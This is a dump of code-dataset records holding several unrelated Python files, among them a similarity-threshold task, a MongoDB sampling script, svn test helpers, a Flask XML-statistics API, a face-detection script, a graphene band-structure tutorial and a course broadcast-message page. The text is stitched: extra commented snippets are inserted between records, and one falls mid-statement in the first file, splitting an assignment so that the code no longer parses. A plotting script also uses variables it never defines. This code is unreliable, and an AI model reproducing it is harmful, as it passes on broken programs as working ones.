ids_found_reverse = ids_present - ids_found\n data_stack[row][4] = ids_found_reverse\n # data_stack[row][5] = (ids_present - ids_found) / (row-ids_found+ids_present) # not (row+1) here\n total_elements_reverse = ((data_stack.shape[0] - row) + ids_found)\n data_stack[row][5] = ids_found_reverse / total_elements_reverse\n if data_stack[row][0] in cmp_patients:\n ids_found += 1\n data_stack[row][2] = ids_found\n total_elements = ((row + 1) - ids_found + ids_present) # +1 to reflect number of elements\n data_stack[row][3] = ids_found / total_elements\n\n print(col.name)\n # find maximum in frontwards and backwards scorses\n max_similarity = float(np.max(data_stack[:, [3, 5]]))\n print(\"highest similarity: \" + str(max_similarity))\n # row 0, col 0 = index 0, row 0 col 1 = index 1 and so on --> divide by two to get row\n max_similarity_row = np.argmax(data_stack[:, [3, 5]]) / float(2)\n # print data_stack[max_similarity_row]\n\n # numerical value at maximum score = value to split\n # ordino will split in values <= threshold and values > thresold\n # so: if highest similarity is in forward group (no 0.5 remainder) -> use value\n # but: if highest similarity is in backward group (0.5 remainder) -> use next lower value\n\n split_reverse = max_similarity_row % 1 != 0 # second column will always have an odd index -> 0.5 remainder\n print(\"split at number: \" + str(data_stack[max_similarity_row, [1]]) + (\" from back\" if split_reverse else \" from front\"))\n\n num_to_split = data_stack[max_similarity_row - (1 if split_reverse else 0), 1]\n # casting none to float does not work\n # if the value is None (no value available) --> make a group with all available values (val <= max)\n # ordino will make another group with missing values itself\n num_to_split = float(num_to_split) if num_to_split is not None else 
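# A condensed numpy sketch of the threshold search in group_similarity():
# sort the numeric column, then at every cut score how well "value <= cut"
# (forward) or "value > cut" (backward) matches the given id set. The scoring
# is a simplification of the loop above, on toy data.
import numpy as np

ids = np.array([1, 2, 3, 4, 5, 6])
values = np.array([0.1, 0.9, 0.2, 0.8, 0.3, 0.7])
group = {1, 3, 5}                       # the ids we want to match

order = np.argsort(values)
member = np.array([i in group for i in ids[order]])
found = np.cumsum(member)               # hits if we cut after each row
total = np.arange(1, len(ids) + 1)
present = member.sum()
forward = found / (total - found + present)
rev_found = present - found
backward = rev_found / (len(ids) - total + rev_found + 1e-12)
best = max(forward.max(), backward.max())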
np.max(data_stack[:, 1])\n result['values'][dataset.id + '_' + col.name] = max_similarity\n result['groups'][dataset.id + '_' + col.name] = col.name + (\" > \" if split_reverse else \" <= \") + str(num_to_split)\n result['threshold'][dataset.id + '_' + col.name] = [num_to_split]\n\n except Exception as e:\n _log.exception('Can not fulfill task. Error: %s.', e)\n raise # rejects promise\n\n return result # to JSON automatically\n","sub_path":"phovea_processing_similarity/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111613062","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 8 14:40:17 2016\n\n@author: Reuben\n\"\"\"\n\ndef oddTuples(aTup):\n '''\n aTup: a tuple\n \n returns: tuple, every other element of aTup. \n ''' \n oddTuple = ()\n for t in range(len(aTup)):\n if t % 2 == 0:\n oddTuple += (aTup[t],)\n\n return oddTuple","sub_path":"Week 3/Odd Tuple.py","file_name":"Odd Tuple.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"344035096","text":"from dependencies import DepRepo\nfrom common.utils import assure_yes\nfrom random import random\nimport pymongo\n\nCOLLECTION_NAME_ORIG = 'new_items_wcancel'\nCOLLECTION_NAME_INTO = 'train_wcancel'\nCOUNT = 10000\n\nsource_collection = DepRepo.mongo_collection(COLLECTION_NAME_ORIG)\ntarget_collection = DepRepo.mongo_collection(COLLECTION_NAME_INTO)\n\nassure_yes('Do you really want to put {} into {}?'.format(COLLECTION_NAME_ORIG, COLLECTION_NAME_INTO))\nassure_yes('{} gonna be truncated'.format(COLLECTION_NAME_INTO))\n\ntarget_collection.delete_many({})\n\nexisting_ids = set()\nfor item in DepRepo.mongo_collection('new_big_train').find({}):\n existing_ids.add(item[\"revs\"][-1][\"id\"])\n\n\nrandom_counter = DepRepo.counter(100)\nprint(\"Randomizing\")\nfor item in source_collection.find({}, no_cursor_timeout=True):\n source_collection.update_one({'_id': item['_id']}, {\n '$set':{\n 'r': random()\n }\n })\n random_counter.tick()\n\nprint(\"Random field created\")\n\n# setting indices\nindices = source_collection.index_information()\nif 'random' not in indices:\n print(\"Creating index\")\n source_collection.create_index([\n (\"vandal\", pymongo.ASCENDING),\n (\"r\", pymongo.ASCENDING)\n ],\n name=\"random\")\n print(\"Index created\")\n\nexcluded_ids = 0\ncnt = DepRepo.counter(100, COUNT)\n\nfor item in source_collection.find({'vandal': True}, no_cursor_timeout=True).sort(\"r\"):\n if len(item[\"revs\"]) < 2:\n continue\n\n if item[\"revs\"][-1][\"id\"] in existing_ids:\n excluded_ids += 1\n continue\n\n del item[\"_id\"]\n target_collection.insert_one(item)\n cnt.tick()\n\n if cnt.value() > COUNT:\n break\n\nprint(\"Total skipped: {}\".format(excluded_ids))\n","sub_path":"tools/extract_vandal_revs.py","file_name":"extract_vandal_revs.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"277850308","text":"# pylint: disable-msg=E1101\n\n# Copyright 2008 German Aerospace Center (DLR)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the 
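# oddTuples() above can also be written as a single slice with the same result.
def odd_tuples(a_tup):
    return a_tup[::2]

assert odd_tuples(('I', 'am', 'a', 'test', 'tuple')) == ('I', 'a', 'tuple')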
License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nSome global test settings and methods.\n\"\"\"\n\nimport os\nimport py.test\nimport tempfile\n\nfrom modules.Config import Config\nfrom modules.Transaction import Transaction\n\n\nclass TestRepository:\n \n commitMessage = \"MANTIS ID 1 MANTIS ID 2\"\n \n def __init__(self):\n \"\"\" Create svn repository. \"\"\" \n self.repodir = tempfile.mkdtemp().replace(\"\\\\\", \"/\")\n self.chkdir = tempfile.mkdtemp().replace(\"\\\\\", \"/\")\n \n os.popen(\"svnadmin create %s\" % self.repodir)\n os.popen(\"svn co file:///%s \\\"%s\\\"\" % (self.repodir, self.chkdir))\n\n def createDefault(self):\n \"\"\" Creates the default repository content. \"\"\"\n self.addFile(\"test 1.txt\", \"content\") \n self.setProperty(\"test 1.txt\", \"svn:keywords\", \"Date\")\n self.addFile(\"test.java\", \"public interface test {\\n}\\n\")\n self.commit(self.commitMessage)\n return self.repodir, Transaction(self.repodir, \"1\")\n\n def addFile(self, filename, content):\n \"\"\" Creates a new file in the repository. \"\"\"\n fd = open(os.path.join(self.chkdir, filename), \"w\")\n fd.write(content)\n fd.close()\n os.popen(\"svn add \\\"%s\\\"\" % os.path.join(self.chkdir, filename))\n \n def setProperty(self, filename, keyword, value):\n \"\"\" Sets a keywords on a file. \"\"\"\n os.popen(\"svn propset %s %s \\\"%s\\\"\" % (keyword, value, os.path.join(self.chkdir, filename)))\n\n def commit(self, commitMessage = \"\"):\n os.popen(\"svn commit -m \\\"%s\\\" %s\" % (commitMessage, self.chkdir))\n return Transaction(self.repodir, \"1\")\n \n def createDiretory(self, path):\n os.mkdir(os.path.join(self.chkdir, path))\n os.popen(\"svn add \\\"%s\\\"\" % os.path.join(self.chkdir, path))\n\n\nclass TestConfig:\n\n # To run the mantis tests you need to configure the options here.\n # You must have a three mantis ids, one and two assigned to you and marked in_progress \n # and the third not assigned to anybody.\n\n mantisConfigString = \"\"\"\nMantis.URL=xxx\nMantis.User=xxx\nMantis.Password=xxx\n\"\"\"\n\n def __init__(self):\n \"\"\" Create the config file. \"\"\"\n self.configFileHandle, self.configFilename = tempfile.mkstemp()\n\n def createConfig(self, content):\n \"\"\" Fill the config file with content. \"\"\"\n content = \"[Default]\\n\" + content\n\n fd = os.fdopen(self.configFileHandle, \"w\")\n fd.write(content)\n fd.close()\n\n return self.configFilename, Config(self.configFilename, self.configFilename)\n\n def createMantisConfig(self, content = \"\"):\n \"\"\" Create a mantis config file. 
\"\"\"\n if \"xxx\" in self.mantisConfigString:\n py.test.skip(\"Please configure mantis access in common.py to run mantis tests.\")\n \n return self.createConfig(self.mantisConfigString + \"\\n\" + content)\n","sub_path":"svnchecker/tags/0.2.1_20080715_REL/svnchecker/tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125879122","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse\nfrom django.template import Context, loader\nfrom models import Item\n\ndef item_page_display(request,item_id):\n # item_idに該当するオブジェクトを取得する\n item = Item.objects.get(id=item_id)\n # テンプレートを取得して、モデルの値とマージする\n t = loader.get_template('page/item.html')\n c = Context(\n {'item':item }\n )\n # HTTP Responseを返す。\n return HttpResponse(t.render(c))\n\n\n","sub_path":"craft/djangotmp/apptmp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"40601950","text":"import re\nimport os\nimport xml.etree.ElementTree as ET\nfrom flask import Flask, json\nfrom flask import jsonify\nfrom flask.globals import request\nfrom flask_cors import CORS\nfrom xml.dom import minidom\n\n\nglobal archivo\n\napp = Flask(__name__)\nCORS(app)\n\nclass Data():\n def __init__(self, evento):\n self.evento = evento\n\n def obtenerDatos(self):\n datos_evento = {} \n datos = self.evento\n rcorreo = re.compile('[\\w]+@\\S+')\n rfecha = re.compile('(?:[0-9]{2}/){2}[0-9]{2}')\n rerror = re.compile('[0-9]{5,}')\n correos = re.findall(rcorreo, datos)\n fechas = re.findall(rfecha, datos)\n errores = re.findall(rerror, datos)\n datos_evento['fecha'] = fechas\n datos_evento['reportado'] = correos[0]\n datos_evento['afectados'] = correos[1:]\n datos_evento['error'] = errores\n return datos_evento\n\n@app.route('/', methods=['GET'])\ndef index():\n return('Api en Flask')\n\n@app.route('/data', methods=['POST'])\ndef data():\n global archivo\n cantidad_mensajes = {}\n archivo = request.files['archivo']\n tree = ET.parse(archivo)\n root = tree.getroot()\n eventos = []\n for evento in root:\n eventos.append(Data(evento.text).obtenerDatos())\n print(evento.text)\n #print(eventos)\n contador = 0\n for evento in eventos:\n for key in evento:\n if key == 'fecha':\n print(f'El key es: {key} y el valor es: {evento[key]}')\n if evento[key][0] in cantidad_mensajes:\n cantidad_mensajes[evento[key][0]] += 1\n else:\n cantidad_mensajes[evento[key][0]] = 1\n\n #Creando XML Estadísticas\n \n raiz_estadisticas = ET.Element('ESTADISTICAS')\n cant_mens = 1\n for key in cantidad_mensajes:\n et_estadistica = ET.SubElement(raiz_estadisticas, 'ESTADISTICA')\n et_dato = ET.SubElement(et_estadistica, 'FECHA')\n et_dato2 = ET.SubElement(et_estadistica, 'CANTIDAD_MENSAJES')\n et_dato.text = str(key)\n et_dato2.text = str(cantidad_mensajes[key])\n correos_leidos = []\n\n for evento in eventos:\n if evento['fecha'][0] == key:\n if evento['reportado'] in correos_leidos:\n cant_mens += 1\n else:\n et_dato3 = ET.SubElement(et_estadistica, 'REPORTADO_POR')\n et_dato4 = ET.SubElement(et_dato3, 'USUARIO')\n et_dato5 = ET.SubElement(et_dato4, 'EMAIL')\n et_dato6 = ET.SubElement(et_dato4, 'CANTIDAD_MENSAJES')\n et_dato5.text = str(evento['reportado'])\n et_dato6.text = str(cant_mens)\n correos_leidos.append(evento['reportado'])\n cant_mens = 1\n et_dato7 = ET.SubElement(et_estadistica, 'AFECTADOS')\n \n for i in 
range(len(evento['afectados'])):\n et_dato8 = ET.SubElement(et_dato7, 'AFECTADO')\n et_dato8.text = str(evento['afectados'][i])\n\n et_dato9 = ET.SubElement(et_estadistica, 'ERRORES')\n et_dato10 = ET.SubElement(et_dato9, 'ERROR')\n et_dato11 = ET.SubElement(et_dato10, 'CODIGO')\n et_dato11.text = str(evento['error'][0])\n et_dato12 = ET.SubElement(et_dato10, 'CANTIDAD_MENSAJES')\n et_dato12.text = str(cant_mens)\n xml_estadisticas = ET.tostring(raiz_estadisticas, 'utf-8')\n xml_parseado = minidom.parseString(xml_estadisticas).toprettyxml(indent='\\t')\n f = open('estadisticas.xml', 'w')\n f.write(xml_parseado)\n f.close()\n \n print(cantidad_mensajes)\n return ('Leída exitosa')\n\n@app.route('/reset', methods=['GET'])\ndef reset():\n global archivo\n archivo = None\n return('Api reiniciada')\n\n@app.route('/consultar', methods=['GET'])\ndef consultar():\n if request.method != 'GET':\n return 'Peticion no válida'\n file = open('estadisticas.xml', 'r')\n contenido = ''.join(file.readlines())\n file.close()\n return contenido\n\n@app.route('/documentacion', methods=['GET'])\ndef documentacion():\n if request.method != 'GET':\n return 'Petición no válida'\n file = \"EnsayoProyecto3.pdf\"\n os.popen(file)\n return 'Abriendo documentacion...'\n\n\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True)","sub_path":"Backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158130953","text":"import time\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nfrom time import time\nfrom skimage import color, feature\nfrom skimage import transform\nimport skimage\nimport joblib\nimport threading\nimport multiprocessing\nimport matplotlib.image as mpimg\n\ndef merge_boxes(indices):\n avg_x = 0.0\n avg_y = 0.0\n for x in indices:\n avg_x += x[0]\n avg_y += x[1]\n try:\n avg_x = avg_x / len(indices)\n avg_y = avg_y / len(indices)\n except ZeroDivisionError:\n return -1, -1\n return int(avg_x), int(avg_y)\n\n\ndef my_nms(indices, height, width, max_distance):\n # TODO : make max distance a percent num rather that pixel distance\n indies = indices[0][0], indices[0][1]\n splits = [[]]\n counter = 0\n for patch in indices:\n if abs(indies[1] - patch[1]) > max_distance or abs(indies[0] - patch[0]) > max_distance:\n splits.append([patch])\n counter += 1\n else:\n splits[counter].append(indies)\n indies = patch[0], patch[1]\n final_avg = []\n for split in splits:\n final_avg.append((merge_boxes(split)))\n print(len(splits))\n return final_avg\n\n\ndef worker(patches):\n return [feature.hog(patch) for patch in patches]\n\n\ndef sliding_window(img, patch_size=(62,47), istep=3, jstep=3, scale=1.0):\n Ni, Nj = (int(scale * s) for s in patch_size)\n for i in range(0, img.shape[0] - Ni, istep):\n for j in range(0, img.shape[1] - Nj, jstep):\n patch = img[i:i + Ni, j:j + Nj]\n if scale != 1:\n patch = transform.resize(patch, patch_size)\n yield (i, j), patch\n\n\ndef dynamic_window(test_image, fast_model, slow):\n img, img_size, img_jump = test_image,0.25, 0.05\n labels = np.zeros(0)\n steps, step_jump, flag = 7, 1, True\n while labels.sum() == 0.0:\n #TODO: change to cnn\n img = skimage.transform.rescale(test_image, img_size)\n\n t = time()\n indices, patches = zip(*sliding_window(img, istep=steps, jstep=steps))\n print(\"[INFO] sliding window took: {:.2f} seconds\".format(time() - t))\n\n t = time()\n patches_hog = np.array([feature.hog(patch) for patch in patches])\n 
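# A minimal standalone version of the XML-building pattern used in the data()
# route above: build a tree with ET.SubElement, serialize, and pretty-print
# through minidom; the element names echo the ones in the route.
import xml.etree.ElementTree as ET
from xml.dom import minidom

root = ET.Element('ESTADISTICAS')
stat = ET.SubElement(root, 'ESTADISTICA')
ET.SubElement(stat, 'FECHA').text = '01/02/21'
ET.SubElement(stat, 'CANTIDAD_MENSAJES').text = '3'
pretty = minidom.parseString(ET.tostring(root, 'utf-8')).toprettyxml(indent='\t')
print(pretty)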
print(\"[INFO] hog patches took: {:.2f} seconds\".format(time() - t))\n\n t = time()\n fast_labels = np.array(fast_model.predict(patches_hog))\n if fast_labels.sum() == 0.0:\n steps -= 1\n continue\n print(\"[INFO] fast predict took: {:.2f} seconds\".format(time() - t))\n print(fast_labels.sum())\n\n patches_hog = patches_hog[fast_labels == 1]\n indices = np.array(indices)\n indices = indices[fast_labels == 1]\n\n t = time()\n # patchs = patchs.reshape(-1, 62, 47, 1)\n labels = slow.predict(patches_hog)\n\n # labels = np.array([p[0] for p in prediction])\n print(\"[INFO] cnn predict took: {:.2f} seconds\".format(time() - t))\n img_size -= img_jump\n if flag:\n steps -= step_jump\n flag = False\n else:\n flag = True\n indices = indices[labels == 1]\n return indices, img_size+img_jump\n #return labels, indices, patches_hog, img\n\n\ndef test(model, fast_model, face_patch_size, image):\n\n #test_image = plt.imread(image)\n #test_image = skimage.data.astronaut()\n #test_image = skimage.color.rgb2gray(test_image)\n test_image = image\n try:\n t = time()\n indices, img_size = dynamic_window(test_image, fast_model, model)\n #fast_labels, indices, patches_hog, test_image = dynamic_window(test_image, fast_model, model)\n except ValueError as e:\n print(\"No bounding box!\",e)\n return []\n if indices.sum() == 0.0:\n raise (Exception(\"No bounding box!\"))\n print(\"[INFO] dynamic window took: {:.2f} seconds\".format(time()-t))\n\n boxes = my_nms(indices, 62, 47, 15) # returns array with x,y position of faces\n return boxes,img_size\n #show result\n \"\"\"Ni, Nj = face_patch_size\n fig, ax = plt.subplots()\n ax.imshow(test_image, cmap='gray')\n\n for i, j in boxes:\n ax.add_patch(plt.Rectangle((j, i), Nj, Ni, edgecolor='blue',\n alpha=0.3, lw=2, facecolor='none'))\n plt.waitforbuttonpress()\"\"\"\n\n\ndef main():\n path = r\"C:\\Users\\user\\Desktop\\final project\\FaceRecognition\\face-clustering\\test\"\n img = r\"\\WhatsApp Image 2020-04-08 at 13.35.55 (5)\"\n fast_model = joblib.load(r\"models\\model_fast.pickle\")\n slow = joblib.load(r\"models\\model5.pickle\")\n test(slow,fast_model, (62, 47), path+img+\".jpeg\")\n\n\nif __name__ == '__main__':\n main()","sub_path":"detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76046671","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 3 11:41:47 2020\r\n\r\n@author: amirc\r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\n#from functions_of_thickness import*\r\nfrom general_functions import *\r\n#from newanalysis_for_characterization import*\r\n#from file_functions import*\r\nimport pickle\r\n\r\n\r\n\r\n#jz_data=np.load('jz_t50point0.npz')\r\n#uiz_data=np.load('uiz_t50point0.npz')\r\n#rho_data=np.load('rho_t50point0.npz')\r\n\r\n\r\njz=jz_data['jz']\r\nuiz=uiz_data['uiz']\r\nrho=rho_data['rho']\r\n\r\n\r\nnx = jz.shape[0]\r\nny = jz.shape[1]\r\n\r\n\r\nuez=uiz-jz/rho\r\nratio= abs(uez)/abs(uiz)\r\nuiz_rms=np.sum(uiz**2)/(nx*ny)\r\n\r\n\r\nx_indices=[index[0] for index in indexes_of_valid_local_maxima]\r\ny_indices=[index[1] for index in indexes_of_valid_local_maxima]\r\n\r\nuiz_peak=abs(uiz[x_indices,y_indices])\r\n#ion_velocity = uiz_peak.tolist()\r\n\r\nuez_peak=abs(uiz[x_indices,y_indices]-jz[x_indices,y_indices]/rho[x_indices,y_indices])\r\n#electron_velocity = uez_peak.tolist()\r\n\r\nratio1 = uez_peak / uiz_peak\r\n\r\n#ratio1 = [i / j for i, 
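# A compact rewrite of the merge_boxes/my_nms idea from detect_face.py: group
# detections that fall within max_distance of the previous hit and average
# each group; the coordinates are toy values.
import numpy as np

def merge_near(points, max_distance=15):
    groups, current = [], [points[0]]
    for p in points[1:]:
        if max(abs(p[0] - current[-1][0]), abs(p[1] - current[-1][1])) <= max_distance:
            current.append(p)
        else:
            groups.append(current)
            current = [p]
    groups.append(current)
    return [tuple(np.mean(g, axis=0).astype(int)) for g in groups]

print(merge_near([(10, 12), (12, 14), (80, 90)]))  # -> [(11, 13), (80, 90)]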
j in zip(electron_velocity,ion_velocity)] \r\n\r\n##############################################################################\r\n\r\nratio2 = abs(1 - 1/np.array(ave_thicknesses)**2)\r\n\r\n# ratio2= [1-1/i**2 for i in ave_thicknesses] \r\n# e=[abs(number) for number in ratio2]\r\n\r\n#############################################################################\r\n\r\n\r\n\r\n# plotting -----------------------------\r\nplt.rcParams['font.size'] = 20\r\nplt.figure()\r\nplt.scatter(ratio2[filter_by_ave_thickness], ratio1[filter_by_ave_thickness])\r\nplt.xlabel('$|1-1/L^2|$')\r\nplt.ylabel('$|u_{ez}|/|u_{iz}|$')\r\nplt.grid()\r\nplt.title('Filtered points')\r\nplt.show()\r\nplt.tight_layout()\r\n\r\n\r\nplt.rcParams['font.size'] = 20\r\nplt.figure()\r\nplt.scatter(ratio2, ratio1)\r\nplt.xlabel('$|1-1/L^2|$')\r\nplt.ylabel('$|u_{ez}|/|u_{iz}|$')\r\nplt.grid()\r\nplt.title('All points')\r\nplt.show()\r\nplt.tight_layout()\r\n","sub_path":"uezuizplot.py","file_name":"uezuizplot.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"218850088","text":"\"\"\"\nPlotting the lattice and band structure of a square lattice and monolayer\ngraphene\n\"\"\"\nimport pybinding as pb\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import sqrt,pi\n\npb.pltutils.use_style()\n\ndef sqr_lattice(ucl,t):\n \"\"\"Returns a square lattice with unit cell length ucl and hopping t\"\"\"\n lat = pb.Lattice(a1 = [ucl,0], a2 = [0,ucl])\n lat.add_sublattices(('A',[0,0]))\n lat.add_hoppings(([0,1],'A','A',t),([1,0],'A','A',t))\n return(lat)\n\ndef monolayer_graphene():\n \"\"\"Returns a littce object that looks like monolayer graphene\"\"\"\n a = 0.24595 # A\n aCC = 0.142 # A\n t = -2.8 # eV\n lat = pb.Lattice(a1 = [a,0], a2 = [a/2,sqrt(3)*a/2])\n lat.add_sublattices(('A',[0,-aCC/2]),('B',[0,aCC/2]))\n lat.add_hoppings(\n ([0,0],'A','B',t),\n ([1,-1],'A','B',t),\n ([0,-1],'A','B',t))\n return(lat)\n\ndef __main__():\n mlgLattice = monolayer_graphene()\n\n model = pb.Model(mlgLattice,pb.translational_symmetry())\n solver = pb.solver.lapack(model)\n\n aCC = 0.142\n Gamma = [0, 0]\n K1 = [-4*pi / (3*sqrt(3)*aCC), 0]\n M = [0, 2*pi / (3*aCC)]\n K2 = [2*pi / (3*sqrt(3)*aCC), 2*pi / (3*aCC)]\n\n bands = solver.calc_bands(K1, Gamma, M, K2)\n\n bands.plot(point_labels=['K', r'$\\Gamma$', 'M', 'K'])\n\n plt.show()\n\nif __name__==\"__main__\":\n __main__()\n\n\n\"\"\"\n xPos=model.system.x\n yPos=model.system.y\n subLats=model.system.sublattices\n ham=model.hamiltonian.todense()\n print(xPos,yPos,subLats,\"\\n\",ham)\n\n eigVals=solver.eigenvalues\n eigVecs=solver.eigenvectors\n print(eigVals,eigVecs)\n\"\"\"","sub_path":"TB_tutorial/tb_tutorial_01.py","file_name":"tb_tutorial_01.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69092005","text":"'''broadcast: real-time announcements to all catsoop users of this site\n\nStaff: access this page to enter a message and submit it to be\nbroadcast. The message is stored on the server as a json dict, with\ntimestamp and author. All messages are also archived in a catsoop log\nfile.\n\nStudents: javascript code (automatically loaded) polls the server for\na broadcast message, and displays it if unexpired (e.g. within 5\nminutes of creation). 
Once marked as having been seen, it is not\nredisplayed.\n\n'''\nimport os\nimport re\nimport sys\nimport json\nimport time\nimport logging\nimport datetime\nimport traceback\n\nLOGGER = logging.getLogger(\"cs\")\n\n#-----------------------------------------------------------------------------\n# main dispatch function\n'''\nHow this works:\n\nAt the bottom of this file, following lines are executed:\n RQ = RemoteQueue()\n cs_problem_spec = RQ.dispatch(cs_form)\n\nThis tells catsoop to use the dispatch function of the RemoteQueue for all processing\n\nRemoteQueue.dispatch\n Given the form data for the page and the person viewing the page, it determines what the person should see.\n If staff and form_data is empty: show the form for inputting video URL\n If staff and person has saved info/pressed submit: show 'saved' and save data and update remotequeue database:\n data = {'url': url, 'active': active}\n csm_cslog.update_log(self.db_name, [], cs_username, data)\n If person is not staff: run ajax_get_url\n'''\nclass BroadcastMessage:\n\n db_name = \"broadcast_message\"\n MSG_FILE = \"~/cs_broadcast.json\"\n\n def __init__(self, verbose=True):\n self.verbose = verbose\n user_role = cs_user_info.get('role', None)\n self.is_staff = user_role in {'LA', 'TA', 'UTA', 'Admin', 'Instructor'}\n self.is_authorized = user_role in {'TA','Admin', 'Instructor'}\n self.my_url = \"/\".join([cs_url_root] + cs_path_info)\n self.course = _course_number\n\n def dispatch(self, form_data=None):\n '''\n main entry point to generate html responses\n '''\n if form_data is None:\n return \"\"\n if not len(form_data) and self.is_authorized:\n return self.show_form()\n if 'Broadcast' in form_data and self.is_authorized:\n return self.process_form_save(form_data)\n if 'get' in form_data:\n return self.ajax_get_msg(form_data)\n if self.is_authorized:\n return self.show_form()\n return \"\"\n #return \"
<pre>%s</pre>
\" % form_data # for debugging\n\n def ajax_get_msg(self, form_data):\n '''\n If staff claimant is active, and has remote url, then return a link to this service, but with \"go=\"\n This will let us log actual number of clicks to start video sessions.\n '''\n global cs_handler, content_type, response\n data = self.get_message()\n html = json.dumps(data)\n cs_handler = 'raw_response'\n content_type = \"application/json\"\n response = html\n return \"\"\n\n def get_message(self, get_all=False):\n '''\n Get current message (if all==False); else return all messages, sorted from recent to oldest\n '''\n loginfo = (self.course, [self.db_name], \"all\")\n if get_all:\n data = csm_cslog.read_log(*loginfo)\n return data\n data = csm_cslog.most_recent(*loginfo, lock=False)\n if not data:\n return {}\n if data.get(\"audience\")==\"staff\":\n if self.is_staff:\n return data\n return {}\n return data\n\n def save_message(self, msg=None, audience=None, write_to_file=True):\n '''\n Save URL data (url and active or not)\n \n if write_to_file then also write JSON to self.MSG_FILE (accessed directly by nginx, to reduce catsoop load)\n '''\n data = {'msg': msg, 'creator': cs_username, 'audience': audience, 'datetime': str(datetime.datetime.now())}\n csm_cslog.update_log(self.course, [self.db_name], \"all\", data)\n LOGGER.info(\"[BroadcastMessage] saved data=%s for username=%s!\" % (data, cs_username))\n fn = os.path.expanduser(self.MSG_FILE)\n with open(fn, 'w') as ofp:\n ofp.write(json.dumps(data))\n\n def process_form_save(self, form_data):\n '''\n Save data from form\n '''\n msg = form_data.get(\"msg\")\n everyone = form_data.get(\"everyone\", \"staff\")\n audience = everyone\n if audience==\"on\":\n audience = \"all\"\n if msg:\n self.save_message(msg, audience)\n html = \"Message broadcast!\"\n else:\n html = \"Empty message: nothing done\"\n return self.show_form(extra_html=html)\n\n def show_form(self, extra_html=\"\"):\n '''\n Show input form asking for message\n Also show list of old messages\n '''\n data = self.get_message(get_all=True)\n html = \"

<p>Fill in this form to immediately broadcast a message to users currently connected to the course's system. \"\n        html += \"Select 'staff only' to limit the message to just staff, or 'everyone' to send to all users.</p>\"\n        html += \"<form method='post'>\"\n        html += '''<p>New (short) message to broadcast: <input type='text' name='msg' size='80'/></p>'''\n        html += \"\"\"<p><input type='radio' name='everyone' value='staff' checked/> Send to staff only <input type='radio' name='everyone' value='on'/> Broadcast to everyone: students and staff</p>\n        \"\"\"\n        html += '''<p><input type='submit' name='Broadcast' value='Broadcast'/></p>'''\n        html += \"</form>\"\n        html += extra_html\n\n        html += \"<hr/>\"\n        html += \"<table><tr><th>Date</th><th>Author</th><th>Audience</th><th>Message</th></tr>\"\n        for msginfo in data[::-1]:\n            html += \"<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>\" % (msginfo.get(\"datetime\"),\n                                                           msginfo.get(\"creator\"),\n                                                           msginfo.get(\"audience\"),\n                                                           msginfo.get(\"msg\"))\n        html += \"</table>\"\n        html += \"
\"\n\n return html\n\n#-----------------------------------------------------------------------------\n# this tells catsoop to use the dispatch function for all processing\n\nBM = BroadcastMessage()\ncs_problem_spec = BM.dispatch(cs_form)\n","sub_path":"broadcast/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297533263","text":"from pathlib import Path\nfrom fruit_classifier.preprocessing.preprocessing_utils import \\\n remove_non_images\nfrom fruit_classifier.preprocessing.preprocessing_utils import \\\n truncate_filenames\n\n\ndef main():\n \"\"\"\"\n Pre-processes the images in raw_data\n\n The resulting images are stored in cleaned_data\n \"\"\"\n\n generated_data_dir = \\\n Path(__file__).absolute().parents[2].joinpath('generated_data')\n raw_dir = generated_data_dir.joinpath('raw_data')\n cleaned_dir = generated_data_dir.joinpath('cleaned_data')\n\n # Shorten filenames if they are so long that Windows protests\n truncate_filenames(raw_dir)\n\n if not cleaned_dir.is_dir():\n cleaned_dir.mkdir(parents=True, exist_ok=True)\n\n remove_non_images(raw_dir, cleaned_dir)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fruit_classifier/preprocessing/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308364635","text":"import shutil\nimport tempfile\nimport numpy as np\nimport scipy.sparse as sp\n\nfrom nose.tools import assert_equal\nfrom nose.tools import assert_true\nfrom numpy.testing import assert_array_almost_equal\n\nfrom 